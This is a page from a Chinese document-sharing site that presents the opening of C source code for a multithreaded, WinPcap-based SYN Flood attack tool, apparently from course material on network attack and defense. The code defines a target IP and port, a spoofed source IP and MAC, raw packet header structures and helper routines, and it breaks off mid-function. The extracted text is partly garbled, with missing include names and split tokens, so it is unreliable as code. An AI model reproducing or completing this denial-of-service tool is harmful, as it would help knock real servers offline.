网络攻防原理与技术源代码
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
/*===================================================
* 基于winpcap的多线程SYN Flood攻击源代码
* 运行平台:WinXP,Win2k3,WinVista,Win2k8,Win7
* 编译环境:VC6.0 + winpcap SDK
*====================================================*/
#define WIN32_LEAN_AND_MEAN
#define _WSPIAPI_COUNTOF
#include
#include
#include
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wpcap.lib")
#pragma comment(lib, "packet.lib")
#define MAXTHREAD 20
#define OID_802_3_CURRENT_ADDRESS 0x01010102
#define OPTION_LENTH 6
#define SYN_DEST_IP "192.168.0.22" // 被攻击的IP
#define SYN_DEST_PORT 80 // 被攻击的PORT #define FAKE_IP "192.168.0.11" // 伪装的IP
#define FAKE_MAC "\xB8\xAC\x6F\x1F\x26\xF6" // 伪装的MAC
// 内存对齐设置必须是1
#pragma pack(1)
typedef struct et_header // 以太网首部
{
unsigned char eh_dst[6]; // 目的MAC
unsigned char eh_src[6]; // 源MAC
unsigned short eh_type; // 上层协议类型
}ET_HEADER;
typedef struct ip_hdr // IP首部
{
unsigned char h_verlen; // 版本与首部长度
unsigned char tos; // 区分服务
unsigned short total_len; // 总长度
unsigned short ident; // 标识
unsigned short frag_and_flags; // 3位的标志与13位的片偏移
unsigned char ttl; // 生存时间
unsigned char proto; // 协议
unsigned short checksum; // 首部校验和
unsigned int sourceIP; // 源IP
unsigned int destIP; // 目的IP
}IP_HEADER;
typedef struct tcp_hdr // TCP首部
{
unsigned short th_sport; // 16位源端口
unsigned short th_dport; // 16位目的端口
unsigned int th_seq; // 32位序列号
unsigned int th_ack; // 32位确认号
unsigned short th_data_flag; // 16位标志位
unsigned short th_win; // 16位窗口大小
unsigned short th_sum; // 16位校验和
unsigned short th_urp; // 16位紧急数据偏移量unsigned int option[OPTION_LENTH];
}TCP_HEADER;
typedef struct psd_hdr // TCP伪首部
{
unsigned long saddr; // 源地址
unsigned long daddr; // 目的地址
char mbz;
char ptcl; // 协议类型
unsigned short tcpl; // TCP长度
}PSD_HEADER;
typedef struct _SYN_PACKET // 最终SYN包结构{
ET_HEADER eth; // 以太网头部
IP_HEADER iph; // arp数据包头部
TCP_HEADER tcph; // tcp数据包头部
}SYN_PACKET;
#pragma pack()
typedef struct _PARAMETERS // 传递给线程的参数体{
unsigned int srcIP;
unsigned int dstIP;
unsigned short dstPort;
unsigned char* srcmac;
unsigned char dstmac[6];
pcap_t* adhandle;
}PARAMETERS, *LPPARAMETERS;
// 获得网卡的MAC地址
unsigned char* GetSelfMac(char* pDevName)
{
static u_char mac[6];
memset(mac, 0, sizeof(mac));
LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);
if (!lpAdapter || (lpAdapter->hFile == INV ALID_HANDLE_VALUE))
{
return NULL;
}
PPACKET_OID_DA TA OidData =
(PPACKET_OID_DA TA)malloc(6 + sizeof(PACKET_OID_DATA));
if (OidData == NULL)
{
PacketCloseAdapter(lpAdapter);
return NULL;
}
OidData->Oid = OID_802_3_CURRENT_ADDRESS;
OidData->Length = 6;
memset(OidData->Data, 0, 6);
BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
if(Status)
{
memcpy(mac,(u_char*)(OidData->Data),6);
}
free(OidData);
PacketCloseAdapter(lpAdapter);
return mac;
}
// 计算校验和
unsigned short CheckSum(unsigned short * buffer, int size)
{
unsigned long cksum = 0;
while (size > 1)
{
cksum += *buffer++;
size -= sizeof(unsigned short);
}